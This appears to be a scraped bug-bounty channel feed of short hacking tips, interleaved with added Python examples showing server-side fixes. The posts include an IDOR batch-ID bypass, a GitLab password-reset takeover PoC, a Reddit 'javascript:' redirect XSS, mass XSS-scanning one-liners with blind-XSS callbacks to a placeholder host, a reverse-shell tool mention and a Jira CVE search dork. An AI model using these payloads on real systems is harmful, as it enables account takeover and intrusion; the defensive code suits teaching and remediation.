Hey, don't forget to like and share! And if you give it a try, tell us - we'd love to know how you're using it!
IDOR Bypass Bug Bounty Tip
Sometimes APIs behave unexpectedly when multiple IDs are passed together.
Scenario
• Victim's ID: 5200
• Attacker's ID: 5233
GET /api/users/5200/info → Access Denied
GET /api/users/5200,5233/info → Bypass Successful
Always test for comma-separated, array-style, or batch ID parameters when hunting for IDOR!
#bugbountytips #bugbounty #infosec #cybersecurity #api #IDOR #pentesting #bugbountyTips
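Added example, not part of the original post: one plausible server-side cause of the batch-ID behaviour described above, next to the per-ID check that closes it. The function names and the `owner_only` policy are hypothetical; the post does not show the affected API's code.

```python
import re

ID_RE = re.compile(r"[0-9]{1,12}")
MAX_BATCH = 50  # assumed upper bound on IDs per request


def parse_ids(segment):
    """Split a path segment such as '5200,5233' into integers, strictly."""
    parts = segment.split(",")
    if len(parts) > MAX_BATCH:
        raise ValueError("too many ids")
    ids = []
    for part in parts:
        if not ID_RE.fullmatch(part):  # rejects '', '[5200]', '5200;5233', ...
            raise ValueError("bad id: %r" % part)
        ids.append(int(part))
    return ids


def authorize_weak(caller_id, segment):
    """Flawed: the whole batch is granted if the caller owns ANY listed ID."""
    ids = parse_ids(segment)
    return ids if caller_id in ids else []


def authorize_strict(caller_id, segment, can_read):
    """Hardened: every requested ID must pass the access check on its own."""
    ids = parse_ids(segment)
    denied = [i for i in ids if not can_read(caller_id, i)]
    if denied:
        raise PermissionError("not authorized for ids %s" % denied)
    return ids


def owner_only(caller_id, target_id):
    """Hypothetical policy: users may read only their own record."""
    return caller_id == target_id
```

The same per-ID check has to sit behind every way the API accepts a list (comma-separated path segment, repeated query parameter, JSON array), not only the single-ID route.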
Brut Security
Password Reset Bypass Trick - Some poorly secured endpoints accept multiple email parameters. Try this: POST /passwordReset HTTP/1.1 Content-Type: application/x-www-form-urlencoded [email protected]&[email protected] Or in JSON: {…
Hey Hunters,
DarkShadow is back again with another POC that earned $35,000
GitLab Password Reset via Account Takeover Vulnerability
This vulnerability was recently patched. It exploited the password reset functionality by abusing the JSON request sent from the client side. The request allowed multiple email addresses to be specified without properly verifying them, resulting in the password reset link being sent to both the victim's email and the attacker's email.
POC Request:
"user": {
"email": [
"[email protected]",
"[email protected]"
]
}
I was shared this same method a long time ago.
Don't forget to follow me: DarkShadow
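Added example, not part of the original post and not GitLab's code: a reset handler that refuses the array-valued `email` shown in the PoC and mails the token only to the address stored on the account. `ACCOUNTS`, `extract_email`, `request_reset` and the `send_mail` callback are hypothetical, and the addresses are constructed sample data.

```python
import hashlib
import secrets

# Constructed sample store: lookup key -> account record.
ACCOUNTS = {"victim@example.test": {"email": "victim@example.test"}}


def extract_email(body):
    """Return the single e-mail string from {"user": {"email": ...}} or raise."""
    user = body.get("user") if isinstance(body, dict) else None
    email = user.get("email") if isinstance(user, dict) else None
    if not isinstance(email, str):  # rejects lists, dicts, numbers, None
        raise ValueError("email must be a single string")
    email = email.strip().lower()
    # One address only: no separators that a mailer could read as a list.
    if email.count("@") != 1 or any(c in email for c in ",; \r\n"):
        raise ValueError("malformed email")
    return email


def request_reset(body, send_mail):
    """Issue a reset token and send it to the address of record only."""
    record = ACCOUNTS.get(extract_email(body))
    if record is None:
        return False  # the HTTP layer should still answer generically
    token = secrets.token_urlsafe(32)
    # Store only a hash of the token; the clear value goes out by mail once.
    record["reset_token_sha256"] = hashlib.sha256(token.encode()).hexdigest()
    # Recipient comes from the stored record, never from the request body.
    send_mail(record["email"], token)
    return True
```

Taking the recipient from the stored record means the request can only select an account; it can never add a destination for the reset link.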
Hey Hunters,
DarkShadow here - back again with a quick drop!
If you're using revshells.com and you're tired of testing payloads one by one to get a reverse shell, check out this custom script I created. With just a single command, you can instantly get a reverse shell - no more manual payload hunting!
Let me know if you need
More tools, tips, and hacking content coming your way!
Stay connected with us - the journey has just begun.
Don't forget to like and share!
Hey Hunters,
DarkShadow here back again, dropping some one-liner killer XSS commands
Cleaned XSS Payload Hunting Commands:
1. Wayback + httpx + GF + Dalfox
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
2. Gospider + Dalfox
gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -oP "https?://[^ ]+" | grep "=" | qsreplace -a | dalfox pipe
3. Wayback + GF + Blind XSS via Dalfox
waybackurls target.com | gf xss | sed 's/=.*/=/' | sort -u | dalfox -b yoursubdomain.xss.ht pipe
4. Gospider + Dalfox (Deep Crawl)
gospider -S targets.txt -c 20 -d 3 --js --sitemap --robots | grep -oP "https?://[^\s']+" | grep "=" | uro | dalfox pipe -o gospider_xss.txt
5. Dalfox Direct with Blind XSS
cat urls.txt | dalfox pipe -b yourdomain.xss
Required tools are:
httpx, waybackurls, uro, gf, qsreplace, curl, gospider, dalfox
If you find this helpful and want more cutting-edge tips and tricks, don't forget to follow me: DarkShadow
#bugbountytips #xss
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
For more Join my New telegram Channel: https://t.co/9p1yvzluA4
Good morning hackers,
Let's start morning to hack Reddit account
Hey Hunters,
DarkShadow here, back again dropping an old-school Reddit XSS PoC for you to check out!
Let's break it down and understand the logic behind the vulnerability.
Vulnerable Parameter: ?dest=
What does the dest parameter do?
The dest parameter is commonly used in login flows to redirect users after successful authentication. For example:
A user tries to access a protected page.
Reddit redirects them to:
/login/?dest=/protected/resource
After login, the site redirects them to the original dest URL.
Sounds fine, right? But here's the twist...
PoC Steps (Super Simple):
https://www.reddit.com/login/?dest=javascript:alert(document.domain)
Boom. That's it.
Just throw that URL and watch the magic happen. No need for complex encoding or obfuscation - just a mindset shift.
Keep your payloads sharp and your eyes sharper.
Don't forget to react, share, and follow me on X
DarkShadow
#bugbountytips #xss
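Added example, not part of the original post and not Reddit's code: a validator for a post-login `dest` value that accepts only same-site absolute paths, so a `javascript:` URL like the one in the PoC falls back to a default. `safe_dest` and `login_redirect` are hypothetical names.

```python
from urllib.parse import urlsplit


def safe_dest(dest, default="/"):
    """Return dest only if it is a same-site absolute path, else default."""
    if not isinstance(dest, str) or not dest:
        return default
    # Browsers drop tabs/newlines and treat "\" like "/" when parsing URLs,
    # so reject both before looking at the structure.
    if any(ord(c) < 0x20 or c == "\x7f" for c in dest) or "\\" in dest:
        return default
    # Must start with exactly one "/": rules out "javascript:...",
    # "https://...", and scheme-relative "//host/path".
    if not dest.startswith("/") or dest.startswith("//"):
        return default
    parts = urlsplit(dest)
    if parts.scheme or parts.netloc:
        return default
    return dest


def login_redirect(dest):
    """Build the post-login response: status code and Location header."""
    return 302, {"Location": safe_dest(dest)}
```

If the redirect is performed client-side instead, the same check belongs in front of whatever assigns the value to `location`.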
Who are you in the world of cybersecurity?
Anonymous Poll
42%: Beginner - currently learning cybersecurity
25%: Bug bounty hunter - actually reporting vulnerabilities
7%: Red teamer - simulating real-world attacks to improve defenses
15%: Professional Pentester - Working in a cybersecurity job role
11%: Black hat hacker - unauthorized hacking
Hey Hunters,
DarkShadow here back again, dropping a killer trick
Before testing file upload vulnerability, test the filename parameter.
Don't forget to show your love, and follow me: DarkShadow
https://github.com/NazaninNazari/Origin_Recon
CVE-2025-22157: Improper Access Control in Atlassian Jira, 7.2 rating
The vulnerability allows authenticated attackers to escalate their privileges to administrator level or gain access to restricted workflows in Jira.
Search at Netlas.io:
Link: https://nt.ls/lVuft
Dork: http.meta:"content=\"JIRA\""
Vendor's advisory: https://confluence.atlassian.com/security/security-bulletin-may-20-2025-1561365992.html
The heavy recon features? Still cooking.
addons.mozilla.org/addon/brutscope-extractor